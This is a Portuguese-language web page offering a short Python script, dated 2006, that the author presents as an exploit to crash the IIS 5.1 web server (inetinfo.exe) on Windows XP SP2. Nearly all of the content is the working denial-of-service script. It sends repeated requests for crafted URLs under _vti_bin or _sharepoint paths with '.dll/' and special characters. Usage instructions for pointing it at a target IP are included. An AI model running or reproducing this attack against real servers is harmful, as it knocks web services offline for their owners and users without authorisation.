Exploit para derrubar o IIS 5.1 (inetinfo.exe)
Escrito em Python, testei no IIS 5.1 que vem no Windows XP SP2, não sei se funciona com outro.
Size 1.1 kB - File type text/python-sourceFile contents
#!/usr/bin/python
# Exploit para parar o servico inetinfo.exe (Servidor Web Micro$oft)
# Testado no IIS 5.1 no Windows XP Service Pack 2
# Autor: Rogerio Ferreira
# http://www.rogerioferreira.objectis.net
# Ultima Atualizacao: 28 Abr 2006
import urllib2, random, sys
pasta = random.choice(['_vti_bin','_sharepoint'])
ascii = random.choice(['%3f','"','*',':','<','>'])
barras = random.choice(['\\','/'])
numeros = str(random.choice(xrange(10)))
def main():
"""
Entre com a seguinte sintaxe:
python iis5hack.py [ip_do_alvo|hostname_do_alvo] [tentativas]
Exemplo:
Windows
C:\Python24>python C:\TMP\iis5hack.py 192.168.0.80 5
Linux
$ python iis5hack.py 192.168.0.80 5
"""
if len(sys.argv) < 3:
print main.__doc__
sys.exit()
alvo = sys.argv[1]
contador = int(sys.argv[2])
for n in range(1,contador):
try:
url = urllib2.build_opener()
url.open('http://' + alvo + '/' + pasta + '/.dll/' + ascii + barras + '~' + numeros)
except:
print "Tentando derrubar o IIS..."
print "\n### Concluido! ###"
if __name__ == "__main__":
main()
Click here to get the file